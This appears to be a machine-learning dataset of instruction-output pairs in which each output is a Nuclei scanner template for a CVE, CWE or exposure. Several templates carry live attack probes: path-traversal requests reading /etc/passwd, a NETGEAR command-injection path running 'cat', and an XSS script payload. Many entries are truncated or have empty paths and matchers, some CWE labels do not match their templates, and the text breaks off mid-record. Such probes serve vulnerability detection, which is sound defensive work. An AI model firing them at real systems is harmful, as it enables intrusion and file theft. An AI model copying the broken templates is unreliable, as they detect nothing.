Products: jenkins git\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-36883\n\ninfo:\n name: Jenkins Git <=4.11.3 - Missing Authorization\n author: c-sh0\n severity: high\n description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve,cve2022,jenkins,plugin,git,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}\" \n matchers:\n - type: word\n words:\n - \"repository:\" \n - \"SCM API plugin\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-36883"} +{"instruction": "Generate a Nuclei template for: ActiveCollab Installation Page - Exposure", "input": "Title: ActiveCollab Installation Page - Exposure\nSummary: ActiveCollab Installation Page - Exposure. Detects exposed ActiveCollab Installation page.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: activecollab-installer\n\ninfo:\n name: ActiveCollab Installation Page - Exposure\n author: DhiyaneshDK\n severity: high\n description: Detects exposed ActiveCollab Installation page.\n tags: misconfig,install,exposure,activecollab,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"ActiveCollab Installer\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "activecollab-installer"} +{"instruction": "Generate a Nuclei template for: Dataproc Cluster Publicly Accessible", "input": "Title: Dataproc Cluster Publicly Accessible\nSummary: Dataproc Cluster Publicly Accessible. Ensure that your Google Cloud Dataproc clusters are not configured with external IP addresses to minimize exposure to the Internet. When external IP addresses are assigned to Dataproc clusters, the cluster instances are exposed directly to the Internet. This increases the attack surface and risks accidental data exposure if firewall rules are misconfigured.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: gcloud-dataproc-public-access\n\ninfo:\n name: Dataproc Cluster Publicly Accessible\n author: princechaddha\n severity: high\n description: Ensure that your Google Cloud Dataproc clusters are not configured with external IP addresses to minimize exposure to the Internet. When external IP addresses are assigned to Dataproc clusters, the cluster instances are exposed directly to the Internet. This increases the attack surface and risks accidental data exposure if firewall rules are misconfigured.\n tags: cloud,devops,gcp,gcloud,dataproc,security,networking,public-access,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "gcloud-dataproc-public-access"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: accueil-wampserver\n\ninfo:\n name: Accueil WAMPSERVER Configuration Page - Detect\n author: tess\n severity: medium\n description: Accueil WAMPSERVER configuration page was detected.\n tags: exposure,accueil,wampserver,config,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Accueil WAMPSERVER\" \n - \"Configuration Serveur\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: CVSweb - Detect", "input": "Title: CVSweb - Detect\nSummary: CVSweb - Detect. CVSweb is a WWW interface for CVS repositories with which you can browse a file hierarchy on your browser to view each file's revision history in a very handy manner.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cvsweb-detect\n\ninfo:\n name: CVSweb - Detect\n author: lu4nx\n severity: info\n description: CVSweb is a WWW interface for CVS repositories with which you can browse a file hierarchy on your browser to view each file's revision history in a very handy manner.\n tags: tech,cvsweb,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "cvsweb-detect"} +{"instruction": "Generate a Nuclei template for CVE-2023-41599", "input": "Title: Path Traversal in jfinalcms_project jfinalcms\nSummary: An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: jfinalcms_project jfinalcms\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-41599\n\ninfo:\n name: JFinalCMS v5.0.0 - Directory Traversal\n author: pussycat0x\n severity: medium\n description: An issue in the component /common/DownController.java of JFinalCMS v5.0.0 allows attackers to execute a directory traversal.\n tags: cve,cve2023,jrecms,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-41599"} +{"instruction": "Generate a Nuclei template for CVE-2021-38156", "input": "Title: Cross-Site Scripting (XSS) in nagios nagios_xi\nSummary: In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: nagios nagios_xi\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-38156\n\ninfo:\n name: Nagios XI < 5.8.6 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.\n tags: cve,cve2021,nagios,nagiosxi,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"data-title=\"\">\" \n part: body_5\n - type: word\n words:\n - \"text/html\" \n part: header_5\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-38156"} +{"instruction": "Generate a Nuclei template for: Vercel Source Code Exposure", "input": "Title: Vercel Source Code Exposure\nSummary: Vercel Source Code Exposure. The Vercel Source Code Exposure misconfiguration allows an attacker to access sensitive source code files on the Vercel platform.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: vercel-source-exposure\n\ninfo:\n name: Vercel Source Code Exposure\n author: hlop\n severity: medium\n description: The Vercel Source Code Exposure misconfiguration allows an attacker to access sensitive source code files on the Vercel platform.\n tags: vercel,exposure,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_src\" \n matchers:\n - type: word\n words:\n - \"Deployment Source\" \n - \"Deployment Source \u2013 Dashboard \u2013 Vercel\" \n part: body\n condition: or\n - type: word\n words:\n - \"Login \u2013 Vercel\" \n part: body", "category": "generic", "severity": "medium", "id": "vercel-source-exposure"} +{"instruction": "Generate a Nuclei template for: ccleaner phishing Detection", "input": "Title: ccleaner phishing Detection\nSummary: ccleaner phishing Detection. A ccleaner phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ccleaner-phish\n\ninfo:\n name: ccleaner phishing Detection\n author: rxerium\n severity: info\n description: A ccleaner phishing website was detected\n tags: phishing,ccleaner,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"CCleaner Makes Your Computer Faster & More Secure | Official Website\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "ccleaner-phish"} +{"instruction": "Generate a Nuclei template for: SAP Dispatcher - Detect", "input": "Title: SAP Dispatcher - Detect\nSummary: SAP Dispatcher - Detect. The SAP Dispatcher is the central process that manages communication between user requests and work processes.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sap-dispatcher-detect\n\ninfo:\n name: SAP Dispatcher - Detect\n author: pussycat0x\n severity: info\n description: The SAP Dispatcher is the central process that manages communication between user requests and work processes.\n tags: network,tcp,sap,tech,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sap-dispatcher-detect"} +{"instruction": "Generate a Nuclei template for CVE-2023-23491", "input": "Title: Cross-Site Scripting (XSS) in fullworksplugins quick_event_manager\nSummary: The Quick Event Manager WordPress Plugin, version < 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: fullworksplugins quick_event_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-23491\n\ninfo:\n name: Quick Event Manager < 9.7.5 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: The Quick Event Manager WordPress Plugin, version < 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.\n tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-23491"} +{"instruction": "Generate a Nuclei template for: FullHunt API Test", "input": "Title: FullHunt API Test\nSummary: FullHunt API Test. FullHunt holds one of the largest Databases for external attack surfaces of the entire Internet.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-fullhunt\n\ninfo:\n name: FullHunt API Test\n author: 0ri2N\n severity: info\n description: FullHunt holds one of the largest Databases for external attack surfaces of the entire Internet.\n tags: scan,recon,fullhunt,token-spray\n\nhttp:\n - method: GET\n path:\n - \"https://fullhunt.io/api/v1/domain/interact.sh/details\" \n matchers:\n - type: word\n words:\n - \"\"dns\"\" \n - \"\"hosts\"\" \n - \"\"domain\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-fullhunt"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Google APIs Blogger", "input": "Title: Content-Security-Policy Bypass - Google APIs Blogger\nSummary: Content-Security-Policy Bypass - Google APIs Blogger\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: googleapis-blogger-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Google APIs Blogger\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Google APIs Blogger\n tags: xss,csp-bypass,googleapis-blogger,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"googleapis.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "googleapis-blogger-csp-bypass"} +{"instruction": "Generate a Nuclei template for: DeviantArt API Test", "input": "Title: DeviantArt API Test\nSummary: DeviantArt API Test. Tags: token-spray, deviantart\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-deviantart\n\ninfo:\n name: DeviantArt API Test\n author: zzeitlin\n severity: info\n description: DeviantArt API Test\n tags: token-spray,deviantart\n\nhttp:\n - method: POST\n path:\n - \"https://www.deviantart.com/api/v1/oauth2/placebo\" \n matchers:\n - type: word\n words:\n - \"\"status\" : \"success\"\" \n part: body", "category": "generic", "severity": "info", "id": "api-deviantart"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: stonerssocial-mastodon-instance\n\ninfo:\n name: Stoners.social (Mastodon Instance) User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Stoners.social (Mastodon Instance) user name information check was conducted.\n tags: osint,osint-social,stonerssocial-mastodon-instance,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://stoners.social/api/v1/accounts/lookup?acct={{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"display_name\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2020-13945", "input": "Title: Unknown Vulnerability in apache apisix\nSummary: In Apache APISIX, the user enabled the Admin API and deleted the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data. This affects versions 1.2, 1.3, 1.4, 1.5.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: apache apisix\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-13945\n\ninfo:\n name: Apache APISIX - Insufficiently Protected Credentials\n author: pdteam\n severity: medium\n description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data.\n tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"action\":\"create\"\" \n - \"\"script\":\" \n - \"\"node\":\" \n condition: and\n - type: status\n status:\n - 201", "category": "cve", "severity": "medium", "id": "CVE-2020-13945"} +{"instruction": "Generate a Nuclei template for: tcsh - Privilege Escalation", "input": "Title: tcsh - Privilege Escalation\nSummary: tcsh - Privilege Escalation. tcsh is a Unix shell based on and compatible with the C shell (csh). It provides a command-line interface for interacting with the operating system and executing commands.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-tcsh\n\ninfo:\n name: tcsh - Privilege Escalation\n author: daffainfo\n severity: high\n description: tcsh is a Unix shell based on and compatible with the C shell (csh). It provides a command-line interface for interacting with the operating system and executing commands.\n tags: code,linux,tcsh,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-tcsh"} +{"instruction": "Generate a Nuclei template for: GitHub Refresh Token", "input": "Title: GitHub Refresh Token\nSummary: GitHub Refresh Token. Tags: github, refresh, token\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: github-refresh\n\ninfo:\n name: GitHub Refresh Token\n author: DhiyaneshDK\n severity: info\n description: GitHub Refresh Token\n tags: github,refresh,token,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "github-refresh"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: remedy-axis-login\n\ninfo:\n name: Remedy Axis Login Panel - Detect\n author: tess\n severity: info\n description: Remedy Axis Login Panel - Detect\n tags: panel,remedy,bmc,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/arsys/shared/login.jsp\" \n - \"{{BaseURL}}/rsso/admin/\" \n matchers:\n - type: word\n words:\n - \"BMC Remedy Mid Tier \" \n - \"Remedy Login Page\" \n - \"BMC Remedy\" \n - \"BMC Smart Reporting\" \n part: body\n condition: or", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2016-6277", "input": "Title: Cross-Site Request Forgery (CSRF) in netgear d6220_firmware and others\nSummary: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.\nVulnerability Type: Cross-Site Request Forgery (CSRF)\nSeverity: high\nAffected Products: netgear d6220_firmware, netgear d6400_firmware, netgear r6250_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2016-6277\n\ninfo:\n name: NETGEAR Routers - Remote Code Execution\n author: pikpikcu\n severity: high\n description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.\n tags: cve2016,cve,netgear,rce,iot,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2016-6277"} +{"instruction": "Generate a Nuclei template for CVE-2014-9180", "input": "Title: Unknown Vulnerability in eleanor-cms eleanor_cms\nSummary: Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: eleanor-cms eleanor_cms\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-9180\n\ninfo:\n name: Eleanor CMS - Open Redirect\n author: Shankar Acharya\n severity: medium\n description: Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.\n tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/go.php?http://interact.sh\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2014-9180"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - jsDelivr", "input": "Title: Content-Security-Policy Bypass - jsDelivr\nSummary: Content-Security-Policy Bypass - jsDelivr. Tags: xss, csp-bypass, jsdelivr\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: jsdelivr-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - jsDelivr\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - jsDelivr\n tags: xss,csp-bypass,jsdelivr,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"jsdelivr.net\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "jsdelivr-csp-bypass"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cohost\n\ninfo:\n name: Cohost User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Cohost user name information check was conducted.\n tags: osint,osint-social,cohost,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://cohost.org/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"cohost! - @\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: AJ-Report Open Source Data Screen - Remote Code Execution", "input": "Title: AJ-Report Open Source Data Screen - Remote Code Execution\nSummary: AJ-Report Open Source Data Screen - Remote Code Execution. AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: CNVD-2024-15077\n\ninfo:\n name: AJ-Report Open Source Data Screen - Remote Code Execution\n author: pussycat0x\n severity: high\n description: AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious.\n tags: cnvd,cnvd2024,aj-report,rce,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"code\" \n - \"data\" \n part: body\n condition: and\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "CNVD-2024-15077"} +{"instruction": "Generate a Nuclei template for CVE-2010-5286", "input": "Title: Path Traversal in joobi com_jstore\nSummary: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: joobi com_jstore\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-5286\n\ninfo:\n name: Joomla! Component Jstore - 'Controller' Local File Inclusion\n author: daffainfo\n severity: critical\n description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n tags: cve2010,cve,joomla,lfi,edb,packetstorm,joobi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2010-5286"} +{"instruction": "Generate a Nuclei template for CVE-2025-26319", "input": "Title: Unrestricted File Upload in flowiseai flowise\nSummary: FlowiseAI Flowise v2.2.6 was discovered to contain an arbitrary file upload vulnerability in /api/v1/attachments.\nVulnerability Type: Unrestricted File Upload\nSeverity: critical\nAffected Products: flowiseai flowise\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-26319\n\ninfo:\n name: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.\n tags: cve,cve2025,flowise,fileupload,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"name\":\" \n - \"mimeType\":\"text/plain\" \n part: body\n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"apiKey\":\"\" \n - \"apiSecret\":\" \n - \"chatFlows\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2025-26319"} +{"instruction": "Generate a Nuclei template for: IBM Security Verify Access Login - Panel", "input": "Title: IBM Security Verify Access Login - Panel\nSummary: IBM Security Verify Access Login - Panel. IBM Security Verify Access login panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ibm-security-verify-panel\n\ninfo:\n name: IBM Security Verify Access Login - Panel\n author: johnk3r\n severity: info\n description: IBM Security Verify Access login panel was detected.\n tags: panel,ibm,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"IBM Security Verify Access\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "ibm-security-verify-panel"} +{"instruction": "Generate a Nuclei template for CVE-2024-36527", "input": "Title: Path Traversal in CVE-2024-36527\nSummary: puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\nVulnerability Type: Path Traversal\nSeverity: medium\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-36527\n\ninfo:\n name: Puppeteer Renderer - Directory Traversal\n author: Stux\n severity: medium\n description: puppeteer-renderer v.3.2.0 and before is vulnerable to Directory Traversal. Attackers can exploit the URL parameter using the file protocol to read sensitive information from the server.\n tags: cve,cve2024,puppeteer-renderer,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/html?url=file:///etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2024-36527"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: alternc-panel\n\ninfo:\n name: AlternC Desktop Panel - Detect\n author: Splint3r7\n severity: info\n description: AlternC Desktop panel was detected.\n tags: panel,alternc,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2024-11740", "input": "Title: Code Injection in w3eden download_manager\nSummary: The The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\nVulnerability Type: Code Injection\nSeverity: high\nAffected Products: w3eden download_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-11740\n\ninfo:\n name: Download Manager < 3.3.04 - Unauthenticated Arbitrary Shortcode Execution\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: The The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\n tags: cve,cve2024,wordpress,wp-plugin,download-manager,short-code,wp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"wpdm-all-packages\"\" \n - \"wpdm-download-link download-on-click\" \n part: body\n condition: and\n - type: word\n words:\n - \"No Packages Found\" \n part: body", "category": "cve", "severity": "high", "id": "CVE-2024-11740"} +{"instruction": "Generate a Nuclei template for: phpwind Installer Exposure", "input": "Title: phpwind Installer Exposure\nSummary: phpwind Installer Exposure. phpwind is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: phpwind-installer\n\ninfo:\n name: phpwind Installer Exposure\n author: tess\n severity: high\n description: phpwind is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,phpwind,exposure,install,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install.php?a=check\" \n matchers:\n - type: word\n words:\n - \"Powered by phpwind\" \n - \"\u5b89\u88c5\" \n part: body\n condition: and\n - type: word\n words:\n - \"You have installed. To reinstall, you need to clear the data/install.lock file\" \n - \"\u60a8\u5df2\u7ecf\u5b89\u88c5\u8fc7\uff0c\u9700\u8981\u91cd\u65b0\u5b89\u88c5\u8bf7\u5148\u5220\u9664data/install.lock\u6587\u4ef6\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "phpwind-installer"} +{"instruction": "Generate a Nuclei template for CVE-2017-5982", "input": "Title: Path Traversal in kodi kodi\nSummary: Directory traversal vulnerability in the Chorus2 2.4.2 add-on for Kodi allows remote attackers to read arbitrary files via a %2E%2E%252e (encoded dot dot slash) in the image path, as demonstrated by image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: kodi kodi\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-5982\n\ninfo:\n name: Kodi 17.1 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.\n tags: cve2017,cve,kodi,lfi,edb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2017-5982"} +{"instruction": "Generate a Nuclei template for CVE-2025-61882", "input": "Title: Authentication Bypass in oracle concurrent_processing\nSummary: Vulnerability in the 